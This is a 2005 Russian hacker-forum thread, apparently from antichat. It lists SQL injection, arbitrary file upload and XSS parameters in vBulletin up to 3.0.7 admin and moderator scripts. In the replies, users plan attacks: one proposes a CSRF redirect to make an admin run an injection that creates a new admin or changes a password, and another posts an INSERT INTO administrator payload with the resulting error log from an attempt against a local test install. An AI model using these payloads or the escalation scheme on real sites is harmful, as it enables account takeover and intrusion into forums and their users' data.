PDA

Просмотр полной версии : vBulletin SQL INJ <=3.0.7


WizART
27.09.2005, 23:01
Продукт: vBulletin
URL: http://vbulletin.com
Версия: <= vBulletin 3.0.7
Уязвимость: SQL-инъекция и загрузка произвольных файлов

SQL-Injection:

/joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
/modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
/modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
/modcp/user.php:
GET: <do=avatar&userid=0XF>

/admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
/admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
/admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
/admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
/admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
/admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
/admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
/admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
/admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
/admincp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
/admincp/usertools.php:
POST: <do=updateprofilepic>
/admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

Загрузка произвольных файлов:

/admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>

XSS:

/modcp/index.php:
GET: <do=frames&loc=[XSS]>
/modcp/user.php:
GET: <do=gethost&ip=[XSS]>
/admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
/admincp/index.php:
GET: <redirect=[XSS]>
GET: <do=frames&loc=[XSS]>
/admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
/admincp/usertitle.php:
GET: <do=gethost&ip=[XSS]>
/admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
/admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
/admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]>

Решение: обновить до версии vBulletin 3.0.9
Источник http://www.securityinfo.ru/2005/09/sql_xss______vbulletin.html

Mastermind
29.09.2005, 15:47
какой смысл всех этих уязвимостей, если их юзанье доступно только модераторам (с доступом в modcp) и админам...

kolorom,
/admincp/image.php - тебе не кажется, что сюда имеет доступ только админ?

Sn_key
29.09.2005, 17:06
Отвечаю! Эта уязвимость неактуальна!
Вот линк:
http://forum.antichat.ru/threadnav9723-1-10.html

m0nzt3r
30.09.2005, 12:51
ёпт если переносите тему то предупреждайте а то инфа может выйти за пределы=)))
Визарт внимательным надо быть!

SK | Heaton
30.09.2005, 14:52
2 m0nzt3r... Секреты есть секреты... лол..

WizART
01.10.2005, 18:38
Я то тут причем...я выложил ее перенесли а дальше это уже по вашей косоглазости...

bul666
20.12.2005, 14:38
ПОЧЕМУЖЕ не актуальна?!!! Ёмаё! Проявите воображение! Хакеры...
Предпаложим есть SQL inj (GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>)... БЕРЕм левый сайт ставим на нем редирект на Эту sql'ку. И вся фишка заключается не выводе на экран всех паролей (Как все привыкли), а например которая вставляет нового админа или меняет его пасс.! ))))))))))

Enter.beta
24.12.2005, 02:33
POMOGITE CIUT DODELOT
vot tak ideja v top cto vi regites na forume cto lomajite,
potom delajete etu sql injekciju
INSERT INTO " . TABLE_PREFIX . "administrator (userid, adminpermissions) VALUES (vash_ID, PRAVA)
Po ideje vi polucite prava admina :D
vot kto mozet skazite kakoj TABLE_PREFIX v vB, ato stavit len i kakije prava u korenogo admina obichno tot cto na pervoj stroke v baze dannih

vsio eto obosnovano na 3.5.2 mozet v 3.0.8 podrugomu uvi drugoj versiji ne nashol esli you kogo est vilzite php fail /upload/install/install.php :D

KP0T
24.12.2005, 06:50
А Я знаю зачем xss в админке, вот напримеро пасти других админов, такая типа защита от дурака на форуме на тему садо маза.

Enter.beta
24.12.2005, 18:08
nda toka admin ili mod kazis mogut zalid sql inj
esli komu interesno vot error
Database error in vBulletin 3.0.7:

Invalid SQL:
SELECT * FROM vb3_calendarcustomfield
WHERE calendarcustomfieldid = 58; INSERT INTO vb3_administrator (userid, adminpermissions) VALUES (2, 65532);

mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO vb3_administrator (userid, adminpermissions) VALU

mysql error number: 1064

Date: Saturday 24th of December 2005 02:04:14 PM
Script: http://localhost/upload/admincp/admincalendar.php?do=addcustom&calendarcustomfieldid=58;%20INSERT%20INTO%20vb3_ad ministrator%20(userid,%20adminpermissions)%20VALUE S%20(2,%2065532);
Referer: http://localhost/wtf.htm
Username: Admin
IP Address: 127.0.0.1